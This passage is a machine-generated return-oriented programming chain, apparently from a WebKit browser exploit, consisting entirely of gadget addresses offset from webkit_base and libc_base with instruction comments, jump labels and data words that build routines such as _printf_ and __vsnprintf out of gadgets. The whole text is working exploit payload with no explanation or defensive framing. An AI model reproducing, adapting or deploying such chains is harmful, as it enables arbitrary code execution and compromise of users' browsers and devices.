webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+549904, //L12173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+549888, //L12172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12171:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12173:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+550080, //L12175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+550096, //L12176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+550064, //L12174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12174:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12175:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12176:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+550208, //L12178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+550256, //L12181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+550224, //L12179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12178:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12179:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12180:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12181:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+550368, //L12182+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+550360, //L12182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L12182:
db([0, 0]); // 0x0
set_gadgets([
ropchain+550384, //L12182+24
ropchain+550712, //L12177
libc_base+764760, //pop rsi
ropchain+550424, //L12183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12183:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12185:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+550544, //L12188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+550528, //L12186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12186:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+550688, //L12192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+550656, //L12190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+550672, //L12191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12190:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12191:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12192:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+551280, //L12189
//L12177:
libc_base+764760, //pop rsi
ropchain+550752, //L12193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12193:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12195:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+550872, //L12198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+550856, //L12196
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12196:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12198:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+551016, //L12201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+550984, //L12199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+551000, //L12200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12199:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12201:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+551112, //L12203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12202:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L12203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12204:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+551216, //L12205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+551232, //L12206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12205:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12206:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L12189:
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+551352, //L12207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12207:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12209:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+551472, //L12212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+551456, //L12210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12210:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12212:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+551616, //L12215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+551584, //L12213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+551600, //L12214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12213:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12214:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12215:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+551696, //L12216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12216:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12217:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12218:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+551888, //L12222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+551856, //L12220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+551872, //L12221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12219:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12220:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12221:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12222:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+551944, //L12224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12224:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+552072, //L12226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+552088, //L12227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+552056, //L12225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12225:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12226:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12227:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+552168, //L12228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+552184, //L12229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12228:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12229:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+552280, //L12231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+552264, //L12230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12230:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+552360, //L12232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12232:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12234:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+552480, //L12237
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+552464, //L12235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12235:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12237:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+552560, //L12239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+552592, //L12241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12239:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L12240:
ropchain+552720, //L12238
libc_base+144605 //pop rdi
]);
//L12241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+552696, //L12243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+552712, //L12242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12243:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12242:
db([0, 0]); // 0x0
//L12238:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+552792, //L12244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12246:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+552912, //L12249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+552896, //L12247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12247:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12249:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+553088, //L12252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553104, //L12253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+553056, //L12250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+553072, //L12251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12250:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12251:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12252:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12253:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+553216, //L12254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553248, //L12256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+553232, //L12255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12254:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12255:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12256:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+553352, //L12257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553368, //L12258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12257:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12258:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+553488, //L12259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553472, //L12260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12260:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12259:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+553576, //L12262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+553560, //L12261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12261:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12262:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+553680, //L12263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553696, //L12264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12263:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12264:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+553816, //L12265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+553800, //L12266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12266:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12265:
db([0, 0]); // 0x0
//_printf_:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+553888, //L12268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12268:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+553952, //L12270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12270:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+554040, //L12272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12271:
db([16, 0]); // 0x10
set_gadget(libc_base+759608,); //pop rax
//L12272:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+554096, //L12273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12273:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12275:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12276:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12278:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+554272, //L12281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+554256, //L12279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12279:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12281:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+554416, //L12284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+554384, //L12282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+554400, //L12283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12282:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12283:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12284:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+554496, //L12285
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12285:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12287:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+554616, //L12290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+554600, //L12288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12288:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12290:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+554760, //L12293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+554728, //L12291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+554744, //L12292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12291:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12293:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12294:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12295:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L12296:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+555032, //L12298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+555048, //L12299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+555016, //L12297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+555144, //L12301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+555128, //L12300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12300:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12301:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+555240, //L12303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12302:
db([4294967287, 4294967295]); // -0x9
set_gadget(libc_base+759608,); //pop rax
//L12303:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12304:
ropchain+167544, //__out_char
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12306:
ropchain+555400, //L12305
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12305:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+555472, //L12307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12309:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L12311:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+555632, //L12314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+555616, //L12312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12312:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12314:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+555808, //L12317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+555824, //L12318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+555776, //L12315
